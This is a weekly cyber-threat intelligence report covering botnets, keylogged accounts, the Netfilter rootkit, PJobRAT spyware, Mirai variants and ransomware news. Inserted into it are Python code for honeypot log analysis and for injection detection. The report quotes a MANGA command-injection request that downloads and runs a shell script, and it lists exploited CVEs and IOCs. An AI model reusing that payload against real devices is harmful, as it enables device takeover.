activity summary - week ending 2 july 2021
TRANSCRIPT
TLP GREEN
© 2021 Red Sky Alliance Corp. All rights reserved.
INTELLIGENCE REPORT: ALL SECTOR CYBER THREATS SER. NO.: IR-21-183-001
Activity Summary - Week Ending 2 July 2021:
• Red Sky Alliance identified 19,270 connections from new unique IP addresses
• Analysts identified 2,543 new IP addresses participating in various botnets
• 13 unique email accounts compromised with keyloggers were observed
• Netfilter
• PJobRAT Spyware
• Mirai Knockoffs
• Salvation Army Hit
• Conti & Canada
• DragonForce / Israeli Banking
• Fancy Lazarus attempts an attack on German Banks - Denied
COMPROMISED EMAIL ACCOUNTS
Below are the Top 10 Keylogger emails and the Top Attacker Servers (C2) observed on 2 July 2021 through our
Red Sky Alliance proprietary collection and analysis data. On 28 June 2021, Red Sky Alliance observed 13
unique email accounts compromised with keyloggers which were used to log into mostly personal accounts.
Keylogger: Email          Times Seen
[email protected]          12
[email protected]          12
[email protected]          12
[email protected]          12
[email protected]          7
Attacker Server (C2)      Times Seen
[email protected]          60
[email protected]          52
[email protected]          45
[email protected]          8
[email protected]          6
Table 1: The top two keylogged emails are [email protected] and [email protected]. The first is a Russian account possibly spoofing vad-vmd-05m of Continental Hydraulics in Minnesota, US. This name is associated with several social media accounts. Regardless, it is keylogged and should be avoided. The second, Luci Baron, is a young person who may have been keylogged; this is a Gmail account. These and all of this week's keylogged emails should be blacklisted. Call us for a full list.
Table 2: The top observed Attacker Server (C2) is being used by attackers to maintain communications with compromised systems within a target network. [email protected] and [email protected] have been compromised for many months. This attack server should be blacklisted. Contact Red Sky Alliance for more C2 indicators.
COMPROMISED (C2) IP’S
MALWARE ACTIVITY
On 28 June 2021, Red Sky Alliance identified 19,270 connections from new unique IP addresses, which are checking in with one of the many Red Sky Alliance sinkholed domains.
On 28 June 2021, analysts identified 2,543 new IP addresses participating in various botnets (call for full .csv blacklists; below is only a small sampling of botnet trackers).
IP Contacts
135.181.213.169 65
185.158.115.77 24
129.213.62.230 15
54.39.29.64 14
191.101.217.20 13
147.147.220.127 12
147.147.220.9 11
95.25.211.239 10
62.210.205.65 10
18.189.7.149 10
Malware Variant Times Seen
sality 17082
corkow 1168
sykipot 243
loki 221
shiz 201
koobface 148
wcry_ransom 123
maudi 102
poweliks 89
betabot 84
135.181.213.169 – Hetzner Online GmbH, address: Industriestrasse 25, D-91710 Gunzenhausen, Germany, ASN: AS24940, CIDR: 135.181.0.0/16; 185.158.115.77 – Vnukovo IP Server LLC, address: st. Shabolovka 34, building 3, 115419 Moscow, Russia, ASN: AS44812, CIDR: 185.158.115.0/24
Top 10 malware variants and number of contacts. Sality and Corkow have consistently remained the top variants, followed by the Sykipot malware.
Recorded Future Top 5 Threat Actors and Malware for 06 30 2021 (rankings change daily)
First Seen            Botnet Attribution      Infected Host's IPv4 Address
2021-06-24T21:02:34 SOCKS4 proxy|port:4145 1.0.243.175
2021-06-22T10:51:48 SOCKS4 proxy|port:4145 1.1.155.193
2021-06-22T06:13:12 SOCKS4 proxy|port:4145 1.1.223.117
2021-06-20T07:53:03 HTTP proxy|port:8080 1.2.189.45
2021-06-23T13:01:07 SOCKS4 proxy|port:4145 1.4.169.139
2021-06-26T10:10:58 SOCKS4 proxy|port:5678 1.10.189.108
2021-06-22T06:51:49 HTTP proxy|port:8080 1.20.191.168
2021-06-22T13:12:29 SOCKS4 proxy|port:4145 1.160.26.99
2021-06-22T03:33:10 SOCKS4 proxy|port:4145 1.160.34.69
2021-06-22T23:11:30 SOCKS4 proxy|port:4145 1.160.39.204
Blacklist data is crucial in proactive network security, as it allows companies to defend against network attacks before they are targeted, giving them the opportunity to prevent attacks rather than react to an internal attack. Our blacklists give cyber professionals insight into trending attacks and help identify sources of malicious emails, malicious websites, and other sources of malware infection. Please contact Red Sky Alliance for a full .csv blacklist data subscription.
This past week, there have been continued cyber-attacks seen throughout the world. The results of a malicious attack can put you out of business – prepare today.
MALICIOUS CYBER TRENDS 1
Netfilter—Rootkit Signed With a Valid Digital Certificate – FortiGuard Labs is aware of reports of a recently discovered rootkit named Netfilter. Netfilter, discovered by security researcher Karsten Hahn, carries a valid code signature to evade detection. Signed malware carrying a valid digital certificate is often used by threat actors to evade detection, because it is trusted by antivirus and other endpoint security software. Because a company/organization is vetted by a certificate authority (CA) before the issuance of a digital certificate, operating systems and antivirus software treat files signed with these certificates as clean, which ultimately allows the file(s) to operate with impunity. What makes this latest discovery unique is that the signatures are valid Microsoft signatures. Details are not available at this time as to how these certificates belonging to Microsoft were used to sign the malware. Fortinet customers currently running the latest definition sets are protected against known Netfilter samples. Find more details in our technical FAQ here.
Signatures: W64/Agent.AOD!tr W64/MalDrv.AOD!tr W32/Agent.ADFG!tr W64/Agent.L!tr W32/Agent!tr W32/PossibleThreat W32/UPXHack.A PossibleThreat.FAI
Indicator(s):
Web Filtering - Indian Military Personnel Being Targeted Using PJobRAT Spyware – Researchers discovered an ongoing attack being conducted against the Indian military. The malware is named PJobRAT and is built for Android. The first attack using this malware was in January 2021, though the RAT family is speculated to have first appeared in December 2019. The attacker focuses only on Indian personnel with a military background. PJobRAT is disguised as the current version of the marriage and Indian dating application Trendbanter. Analysis found that the malware only uploads files with specific suffixes from the phone: PDF, PPT, DOC, XLS, DOCX, PPTX and XLSX. Through Android's accessibility functions, the malware is able to retrieve conversation messages from WhatsApp.
The features of this malware include:
• Recording
• Upload SMS
• Upload address book
• Upload image file
• Upload audio files
• Upload a list of external storage files
• Update phone number
• Upload video file
• Upload a list of installed apps
• Upload Wi-Fi, geographic location, and other information
1 Fortinet Intel Blog, 06 25 2021
The malware uses only two types of communication: Firebase Cloud Messaging (FCM) and HTTP. Once it runs on a mobile phone, it begins executing the activities listed above, gathers the information from the victim and sends it to the attacker through the command-and-control server; the data is pushed via the FCM message push function. FortiGuard Labs has classified all related IOCs.
Indicator(s):
• 144[.]91[.]65[.]101/senewteam2136/mainfiles/file_handler[.]php
• 144[.]91[.]65[.]101/senewteam2137/mainfiles/file_handler[.]php
• 144[.]91[.]65[.]101
• helloworld[.]bounceme[.]net/axbxcxdx123/test[.]php
• helloworld[.]bounceme[.]net
Mirai Knockoffs / Fortinet Research Blog – Five years have passed since the source code of the MIRAI IoT malware was released to the public (2016). This led to numerous copycats building their own IoT botnet armies with their own tactics. Although improvements have been constantly added since then by various threat actors, the structure and goal of the campaigns have remained the same. IoT malware scans the Internet for IoT devices that use default or weak usernames and passwords. These hackers seek to exploit known—and sometimes even zero-day—vulnerabilities to increase their chances of gaining access. Once they do, malicious binaries are downloaded and executed that make the device part of a zombie network that can then be instructed to participate in a Distributed Denial-of-Service (DDoS) attack, causing a service outage for an unfortunate target. Some threat actors even sell these new botnets as a service. Researchers have been closely monitoring the current state of the IoT botnet threat landscape from the perspective of an IoT device with the help of a honeypot system.
So, where do these attacks come from? To simulate what it would be like for a new IoT device to be connected to the Internet for the first time, Fortinet set up a fresh honeypot system to capture what kinds of attacks it would receive. This honeypot was designed to be vulnerable to telnet credential brute-force attacks. The statistics in this article were taken from a three-week period. On average, this honeypot system received around 200 attacks per day, ultimately recording nearly 4700 telnet connections in just three weeks. Nearly 4000 of those attacks were identified and connected to a Mirai-related malware family. Since this honeypot does not execute any of the downloaded binaries, most of the attacks keep retrying until their malware has executed in the system. By removing IP duplicates, the actual number of attack sources was obtained and is broken down in the next table.
Figure 1. Unique telnet source IPs per country
Top IoT Malware Variants - Mirai variant authors use unique strings or tokens in their binaries that are used to verify whether SSH or Telnet commands were successfully executed in the device—although this could also be used by the threat actors to advertise their malware or, in some cases, simply as a placeholder for novelty messages.
The figure below shows a sequence of commands that the SORA Mirai variant executes immediately after gaining access to a device. These strings have been heavily used by researchers over time to classify variants. However, there are cases where variants may use different tokens but turn out to be the same malware function-wise—and are even operated by the same threat actor. In such cases, analyzing the actual binary being downloaded into the device would greatly help further define the number of existing variants.
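As an added example (not code from the Fortinet write-up or from Red Sky Alliance), the following Python tallies a telnet honeypot's sessions the way the paragraphs above describe: deduplicating attack sources by IP, averaging connections per day, and attributing each session to a variant by the marker token the bot echoes after login. The log line format, the sample records and the token-to-variant table are constructed assumptions for illustration.

```python
"""Summarise telnet honeypot sessions: unique sources, daily rate, and
variant attribution by the marker token a bot sends after login.
Sample data and the token table are constructed for this example."""
import re
from collections import Counter, defaultdict

# ASSUMED mapping of post-login marker tokens to variant names. Real tokens
# differ per build and must be confirmed from session captures or binaries.
VARIANT_TOKENS = {
    "SORA": "SORA",
    "MANGA": "MANGA",
    "SYLVEON": "SYLVEON",
}

# Constructed honeypot records: timestamp, source IP, credentials tried,
# and the first command sent after the honeypot's fake "login successful".
SAMPLE_LOG = """\
2021-06-21T03:12:09 src=198.51.100.7 user=admin pass=admin cmd=/bin/busybox SORA
2021-06-21T03:12:41 src=198.51.100.7 user=admin pass=admin cmd=/bin/busybox SORA
2021-06-21T11:40:02 src=203.0.113.55 user=root pass=password cmd=/bin/busybox MANGA
2021-06-22T01:05:13 src=198.51.100.7 user=admin pass=1234 cmd=/bin/busybox SORA
2021-06-22T09:22:44 src=192.0.2.88 user=root pass=root cmd=enable
2021-06-23T17:58:30 src=203.0.113.55 user=root pass=password cmd=/bin/busybox MANGA
2021-06-23T18:01:05 src=192.0.2.101 user=support pass=support cmd=/bin/busybox SYLVEON
this line is deliberately malformed and must be skipped
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) pass=(?P<pw>\S+) cmd=(?P<cmd>.*)$"
)


def parse_sessions(text):
    """One dict per well-formed session line; malformed lines are dropped."""
    sessions = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            sessions.append(m.groupdict())
    return sessions


def attribute_variant(cmd):
    """Map a post-login command to a variant by the whole-word marker token."""
    for token, variant in VARIANT_TOKENS.items():
        if re.search(rf"\b{re.escape(token)}\b", cmd):
            return variant
    return "unknown"


def summarize(text):
    """Connection count, deduplicated sources, daily average, and per-variant
    counts of both sessions and distinct source IPs (the dedup the text describes)."""
    sessions = parse_sessions(text)
    days = {s["ts"][:10] for s in sessions}
    unique_sources = {s["src"] for s in sessions}
    sessions_per_variant = Counter(attribute_variant(s["cmd"]) for s in sessions)
    sources_per_variant = defaultdict(set)
    for s in sessions:
        sources_per_variant[attribute_variant(s["cmd"])].add(s["src"])
    return {
        "connections": len(sessions),
        "unique_sources": len(unique_sources),
        "avg_per_day": len(sessions) / len(days) if days else 0.0,
        "sessions_per_variant": dict(sessions_per_variant),
        "sources_per_variant": {k: len(v) for k, v in sources_per_variant.items()},
        "top_credentials": Counter((s["user"], s["pw"]) for s in sessions).most_common(3),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The same pass over a real honeypot export gives the "attack sources" figure the article derives by removing IP duplicates, while the raw session count mirrors its "connections" figure.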
Based on the attacks received by the honeypot, the following table shows the top 10 variants we were able to identify.
The Enigmatic Hajime - Hajime was titled as the successor to the first generation of Mirai. Built on the same principle and goals as its predecessor, it tries to propagate to IoT devices by brute-forcing credentials using a password list of common default device passwords. However, unlike Mirai, Hajime utilizes a decentralized peer-to-peer network to issue commands to its bots. This makes it much harder to locate the Command-and-Control (C2) server for a takedown. Aside from its sophisticated bot network communication, it is also one of the most mysterious variants due to its vague intentions. Commands sent to Hajime bots are in the form of structured messages that are passed along in the peer-to-peer network. One of these commands instructs bots to download and execute binaries, internally called "modules". Only the spreading module has been observed being served in the wild. No attack or disruptive modules have been observed, and Hajime has never been associated with any disruption attacks. Additionally, part of its behavior is to block access to ports that are commonly targeted by other IoT malware, thereby inadvertently (or not) somewhat protecting the infected device from further infections.
And it delivers the following message to the device’s terminal: “Just a white hat, securing some systems. Important messages will be signed like this! Hajime Author. Contact CLOSED Stay sharp!”
Figure 3. Sample shell commands executed by a SORA bot
Figure 2. Top ten identified variants
It was only a matter of time before some speculated that Hajime might be the work of a real vigilante.
SYLVEON Coming Out of Retirement? What surprised Fortinet was the appearance of the SYLVEON variant on the table. In mid-2019 there was a 14-year-old European IoT malware author who went by the names "Light The Sylveon" and "Light The Leafeon". When researchers took a quick look at the decrypted strings of one of the captured binaries, the word "Leafeon" was found, creating speculation that this might be the author's comeback.
"Light the Sylveon" co-created the destructive SILEX IoT malware, whose goal was to render vulnerable devices inoperable by running destructive commands, very similar to BrickerBot. From the malware authors' perspective, based on a message embedded in the malware's binary, this was to "prevent skids to flex their skidded botnet." Eventually, the "Light The Sylveon" author announced through a post on his Twitter account that he was going to abandon the project. Unlike SILEX, however, SYLVEON is a conventional IoT malware that was clearly based on the Mirai source code with some added attacks. Interestingly enough, the group greek.Helios and a certain Thar3seller, previously associated with other IoT malware campaigns, currently claim to be the authors of this variant. The relationship between these different authors is still unclear. What is certain is that this variant is being actively operated, as also shown by recently updated binaries found on one of its download servers.
Figure 4. Function name list found in a SYLVEON binary.
Figure 5. Open directory hosting SYLVEON variant
SORA - The Surviving Member of the Wicked Family. It is interesting to see Mirai variants that were authored by the threat actor known as Wicked, whom we covered three years ago. These variants include Owari, Omni, Wicked, and SORA. Based on an interview at that time, the author stated he was going to focus on Owari and Omni while abandoning the other two variants, including SORA. Based on our observations, it seems that SORA has survived more successfully than its siblings.
Mirai Variant MANGA Actively Updates its List of Targeted Vulnerabilities - Aside from the honeypot, we have also been monitoring Mirai variants from other sources. In particular, we have been closely monitoring the developments of the MANGA variant because it is one of the most active in terms of adding new exploit vectors to its list.
A few weeks ago, it added several more exploits, two of which are recent:
OptiLink ONT1GEW GPON Remote Code Execution (formTracert function)
CVE-2021-1498 (Cisco HyperFlex HX Remote Code Execution)
CVE-2021-31755 (Tenda Router AC11 Remote Code Execution)
(Unidentified target)
Figure 6. Strings found in a SYLVEON binary
Figure 7. Sample request
Here is a list of other vulnerabilities this malware variant tries to exploit:
Vulnerability Description
CVE-2021-22986 F5 iControl REST Remote Code Execution
CVE-2009-4490 mini_httpd 1.18 Escape Sequence
CVE-2018-10088 XiongMai uc-httpd Buffer Overflow
CVE-2020-28188 TerraMaster TOS Remote Code Execution
CVE-2020-29557 D-Link DIR-825 Buffer Overflow
CVE-2020-25506 D-Link DNS-320 Remote Code Execution
CVE-2021-22502 Micro Focus OBR Remote Code Execution
CVE-2021-27561/CVE-2021-27562 Yealink DM (Device Management) Remote Code Execution
CVE-2021-22991 F5 BIG-IP Buffer Overflow
VisualDoor(2021-01-29) SonicWall SSL-VPN Remote Code Execution
Unknown 2 key parameter on /cgi-bin/login.cgi leading to Remote Code Execution
Sample request:
POST /cgi-bin/login.cgi HTTP/1.1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
key=';`cd /tmp; wget http://{REDACTED IP}/lolol.sh; curl -O http://{REDACTED IP}/lolol.sh; chmod 777 lolol.sh; sh lolol.sh;`;#
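As an added detection example (not code from Fortinet or Red Sky Alliance), the Python below scores form parameters in web-server request records for the shape of the login.cgi sample request above: shell metacharacters combined with a download-and-execute chain (wget/curl into /tmp, chmod, sh). The request records, the stager word list and the alert threshold are constructed assumptions, and the sample payload uses documentation addresses in place of the redacted IP.

```python
"""Flag MANGA-style command injection in form parameters such as the `key`
field posted to /cgi-bin/login.cgi. Records and thresholds are constructed
for this example; tune the word list and threshold to your own traffic."""
import re
from urllib.parse import unquote_plus

# Constructed request records with the body kept exactly as received.
SAMPLE_REQUESTS = [
    {"src": "192.0.2.10", "method": "POST", "path": "/cgi-bin/login.cgi",
     "body": "key=';`cd /tmp; wget http://192.0.2.200/lolol.sh; "
             "curl -O http://192.0.2.200/lolol.sh; chmod 777 lolol.sh; sh lolol.sh;`;#"},
    {"src": "198.51.100.4", "method": "POST", "path": "/cgi-bin/login.cgi",
     "body": "key=correct-horse-battery&user=admin"},
    {"src": "198.51.100.9", "method": "POST", "path": "/cgi-bin/login.cgi",
     "body": "key=%27%3B%60wget+http%3A%2F%2F192.0.2.201%2Fx.sh%60%3B%23"},
    {"src": "203.0.113.3", "method": "GET", "path": "/index.html", "body": ""},
]

# Shell metacharacters that let a value escape a quoted argument.
SHELL_META = re.compile(r"[`;|&$]|\$\(")
# Words typical of a fetch-and-run stager (assumed list, extend as needed).
STAGER_WORDS = ("wget ", "curl ", "tftp ", "chmod ", "/tmp", " sh ", "busybox")


def parse_form(body):
    """Split an application/x-www-form-urlencoded body on '&' only, then
    percent-decode each side; ';' inside a value must stay part of the value."""
    params = []
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((unquote_plus(name), unquote_plus(value)))
    return params


def injection_score(value):
    """1 point for shell metacharacters plus up to 3 for distinct stager words."""
    score = 1 if SHELL_META.search(value) else 0
    lowered = value.lower()
    score += min(3, sum(1 for w in STAGER_WORDS if w in lowered))
    return score


def analyse(req):
    """Return (verdict, details): 'alert' when metacharacters and at least one
    stager word appear in one parameter, 'suspect' for metacharacters alone."""
    if req["method"] != "POST" or not req["body"]:
        return "clean", {}
    worst_score, worst_param = 0, None
    for name, value in parse_form(req["body"]):
        s = injection_score(value)
        if s > worst_score:
            worst_score, worst_param = s, name
    details = {"param": worst_param, "score": worst_score, "path": req["path"]}
    if worst_score >= 2:
        return "alert", details
    if worst_score == 1:
        return "suspect", details
    return "clean", {}


def scan(requests):
    """Per-request (source, verdict, details) triples for a batch of records."""
    return [(r["src"], *analyse(r)) for r in requests]


if __name__ == "__main__":
    for src, verdict, details in scan(SAMPLE_REQUESTS):
        print(src, verdict, details)
```

Because the body is split on '&' before decoding, the semicolons and backticks that carry the injection stay inside the `key` value, which is where the score is computed.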
Analyst conclusion - As the number of installed IoT devices continues to explode, especially given the current lack of security standards to protect them, IoT will be a hotbed for malware operations for the foreseeable future, as demonstrated in this article. Interestingly, Mirai variants are still very active in terms of both attack and development.
IOCs: MANGA
Files (SHA256)
Download URLs
Hajime
Files (SHA256) a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3
Download URLs
Sample commands after gaining access:
SYLVEON
Files (SHA256)
Download URL:
Sample commands after gaining access:
GLOBAL TRENDS:
UK / Salvation Army (Charity) - The Salvation Army (SA) in England has been hit by a ransomware attack. It is reported the Christian charity organization is negotiating with the attackers over the stolen data. UK media is reporting the Salvation Army first noticed the attack around a month ago, which is believed to have affected a London data center used by the charity.2 A Salvation Army spokesperson confirmed the attack took place and that the UK's Information Commissioner's Office (ICO) has been informed: "We are investigating an IT incident affecting a number of our corporate IT systems. We have informed the Charity Commission and the ICO, are also in dialogue with our key partners and staff and are working to notify any other relevant third parties." The SA said that none of its services for vulnerable people had been affected. As of 1 July, there is no further information about the cyber-attack, such as the attackers' identity or the data accessed. As of this same date, no data has appeared on any known ransomware gang sites. Salvation Army staff and volunteers have been advised by authorities to keep a close watch for any unusual banking activity on their accounts or suspicious communications they receive. This cyber-attack has further demonstrated that no organization is safe when it comes to ransomware and that all must be prepared to face attacks at any time. A systems engineering manager at Infoblox said, "This latest attack on the UK arm of the Salvation Army shows that ransomware is growing in sophistication and that actors are getting bolder. No organization is off-limits, even those in the charity sector. When it comes to ransomware, the only truly effective approach is prevention. If an unprotected system gets attacked, there is no way to guarantee the retrieval or decryption of data. Mitigating risk before an attack can happen is the most effective defense an organization can have. Security solutions – such as those that leverage DNS – that can interrupt the malware's attempt to connect to the command-and-control server, as well as frequent and robust backups, are key. All organizations - regardless of size or sector - should expect ransomware attacks and prepare accordingly."
The CEO at CybSafe added, "Sadly, this latest incident is just one of a spate of ransomware attacks to have occurred over recent months. Schools, healthcare services and charities such as the Salvation Army are being increasingly targeted by malicious actors who view them as soft targets. Given the growing frequency of these attacks, it's never been more important for organizations and individuals to take the necessary measures to protect themselves online. We need to move beyond basic awareness training and more seriously consider the human aspect of cybersecurity. As these attacks become more sophisticated, they also become more personalized, and therefore an approach towards cybersecurity must mirror this if organizations and individuals are to successfully fend off such threats."
2 https://www.infosecurity-magazine.com/news/salvation-army-ransomware-attack/
Conti & Canada - Three more Canadian companies have been listed on a ransomware group's website as victims of its attacks. The firms are an internet provider in southwestern Ontario, an engineering firm in eastern Ontario and an insurance broker in Quebec. The Conti ransomware group says it has stolen data from all three, and as proof posted copies of what it says are some of the files. The Conti group has a reputation of not bluffing. The three are either small or medium-sized firms, more evidence that ransomware gangs and their affiliate partners, who actually do the targeting, are not just after big companies.3 There were lots of headlines earlier this year when the US, Canada and other countries blamed a Russian-based threat group for being behind the compromise of the SolarWinds Orion network management platform. Despite all the attention, the group is still active, according to Microsoft. The company said Friday that the group, which it calls Nobelium, has recently been trying to break into targeted organizations in Canada, the US, Germany and other countries. Although most attempts were unsuccessful, Microsoft admitted that the computer of one of its customer support staff was hacked. Stolen customer information from that hack was used by Nobelium to try to get into their organizations. Nobelium mainly targets IT-related companies and governments but has also been seen going after think tanks and financial services firms. In addition to using stolen information to try to get into organizations, Nobelium uses password spray and brute-force password attacks.
3 https://www.itworldcanada.com/article/cyber-security-today-june-28-2021-more-canadian-firms-hit-with-ransomware-nobelium-group-attempting-to-infiltrate-canadian-and-u-s-firms-dreamhost-data-fumble-and-more/455193
DragonForce / Israeli Banking - The Israeli banking system was attacked last weekend by hundreds of
Malaysian hackers in an attempt to damage the state’s financial apparatus. The anti-Israel group of hackers
called “DragonForce” who carried out the attack claimed they had damaged the entire system; the hackers posted
screenshots that appeared to show the collapse of the computers on Israeli banking sites. However, it is estimated
that in many cases, these were fake pics. The attack was carried out in three waves, was aimed at harming the
services from the banks’ websites, and “even to try and film them through a distributed denial of service (DDoS)
attack.” The final wave of attacks, launched in the late hours of 25 June was the most intense and difficult of them
all, according to the Hebrew-language Ynet site. “This is an urgent call for all hackers around the world to unite
again and start a campaign against Israel,” the group’s Telegram group said. Hundreds of thousands of members
joined via Twitter, Telegram, Facebook and a forum.
Against the background of Israel’s activities in Gaza, the group launched the current attack a few days before its
planned date, distributing the Internet addresses of Israeli banks and inviting hackers who hated Israel from all
over the world to participate in the attack. In Israel, cyber defense personnel prepared for the attack and reportedly
prevented most of the attempts. A source at one of the banks told Ynet that when the bank’s cyber defense
personnel managed to block the Internet addresses of the attackers, they saw a message on the screen as if the
bank’s website had crashed. “Some of the time they posted all kinds of ‘successes’ [but] it was a ‘Photoshop'”
the source said. During a DDoS attack, the attackers launch thousands of requests simultaneously with the aim of causing the targeted site to crash. According to estimates by experts who participated in the defense of the banks, the scope of the attack reached approximately 200 megabytes per second, which is a considerable volume. The purpose of this type of attack is to exploit the high number of attackers to collapse the computer systems, rather than to infiltrate them to obtain information. A source in the Israeli banking system said the targeted load of inquiries led to a brief slowdown and denial of service at all banks' sites.
One of the attacks was aimed at the Bank of Israel. “From time to time attempts are made to carry out DDoS
attacks on the Bank of Israel’s external website and on websites of government ministries,” the Bank of Israel said
in a statement. “Such attempts are routinely blocked without damage to the website; thus in any case such
attempts do not affect the bank’s systems.” Other banks issued similar statements, saying the attempted attack
was “unsuccessful and no damage to any service or process was identified.”
DragonForce recently published one file that allegedly contained the names and addresses of hundreds of
thousands of Israeli students and another that contained a list of Israelis’ passports as well as other personal data.
In this case, however, experts in Israel’s cyber defense system said such attempts as those on the banks’ websites
are “routinely recognized and stopped. In this case too, the banks were prepared and all attempts were stopped
without harming the service or any process.”
Germany / Banking Attack - German authorities allegedly stopped a cyberattack on a data service provider used by federal agencies and pushed back on a report that a broad assault targeted critical infrastructure and banks. The attempted attack was quickly handled and the impact on service was "very marginal," an Interior Ministry spokesman told reporters on 30 June. He added that it was likely criminally motivated. German media cited unidentified intelligence sources saying that a hacker group linked to the Kremlin had carried out an attack on German infrastructure and the country's banking system. The group was identified as "Fancy Lazarus," after earlier referencing "Fancy Bear," a group controlled by Russia's GRU military intelligence agency. German officials have not detected an increase in cyber activity in recent days. Germany's BSI Federal Cyber Security Authority denied Twitter reports and said that the agency had no knowledge of the attack, which media sources said may be revenge for international sanctions leveled on Russia and Belarus.
Proofpoint Inc., a cybersecurity firm, said this month in its blog that Fancy Lazarus previously identified themselves as Fancy Bear and have been involved in an increasing number of so-called distributed denial-of-service attacks, including against the energy, financial and insurance industries. Such attacks attempt to overload systems by flooding the target with superfluous requests from multiple sources. Proofpoint said there was no known connection to the Fancy Bear group that has been labeled an advanced persistent threat.
A spokesperson for Deutsche Bank AG and Commerzbank AG and for lobby groups for savings, cooperative and private lenders said they were looking into the attempted cyber-attack. With elections looming in September and Chancellor Angela Merkel poised to step aside, German authorities are on the alert for the potential for interference from Russia, both in terms of cyberattacks on infrastructure as well as disinformation campaigns. The Green party's chancellor candidate, Annalena Baerbock, has become a target given her strong opposition to the almost-completed Nord Stream 2 pipeline that would channel gas from Russia to Germany.
CYBER THREAT ANALYSIS CENTER (CTAC) 1 July 2021
Dark Web Collection/Analysis
Bank of Israel – Hits: 183
The Bank of Israel is the central bank of Israel. The bank's headquarters is in
the Kiryat HaMemshala section of Jerusalem, with a branch office in Tel Aviv.
The primary objective of the Bank of Israel is to maintain price stability and
the stability of the financial system in Israel.
Activist Corner
4 The Overton window is the range of policies politically acceptable to the mainstream population at a given time.
5 https://www.democracynow.org/2021/6/29/headlines/an_overt_political_blockade_minnesota_police_barricade_line_3_pipeline_protest_camp
6 https://patch.com/massachusetts/waltham/pipeline-protesters-stage-sit-enbridge-office-waltham
Two members of the US Congress are seen yukking it up with a Sunrise Movement (SM) youth reporter in the halls of Congress. This podcast is to further promote the Green New Deal, the Civilian Climate Corps (CCC) and the unionization of its proposed workforce. These titles are a knock-off of the New Deal and CCC programs of the US Depression era (1930s) under President F. Roosevelt. Sunrise Movement is a US political action youth organization that advocates political action on climate change. After political actions, they turned their focus to shifting the Overton window on climate policy to center the environmental program known as the Green New Deal. Together with Justice Democrats and Alexandria Ocasio-Cortez, the group is now a highly organized activist group.
Last Monday, MN sheriff's deputies barricaded access to an encampment of environmental activists who are resisting construction of the Enbridge Line 3 tar sands pipeline, which has the backing of the Biden administration. Officers towed several of the activists' cars and made several arrests throughout the day. An attorney for the Indigenous-led protesters called the move "nothing less than an overt political blockade." Over in Waltham, MA, protesters opposing a compressor and pipeline project are staging a sit-in at the Waltham offices of Enbridge. Hmmmm. Coincidence? The protesters oppose the company's Weymouth compressor and Line 3 pipeline projects, according to a tweet from an environmental reporter. Police arrived around noon to get the protesters out of the building for trespassing, according to the tweet. Last week marked the end of a global week of action against insurers of Canada's Trans Mountain pipeline and its expansion project. The protests, calling on its insurers to cut ties with the federally owned pipeline, spanned 25 actions across four continents. Another coincidence? Last Sunday, London police arrested 23 members of the activist group Extinction Rebellion during a "Free the Press" day of protest against media corruption in the United Kingdom. The highlight of the Sunday action was when protesters dumped seven tons of horse manure at the doorstep of the British tabloid Daily Mail and defaced its entrance with spray paint. Protesters sent a message to four billionaires who they say control 68% of the UK's print media to "cut the bullsh*t!" and demanded "an end to media corruption that suppresses the truth from the public for profit."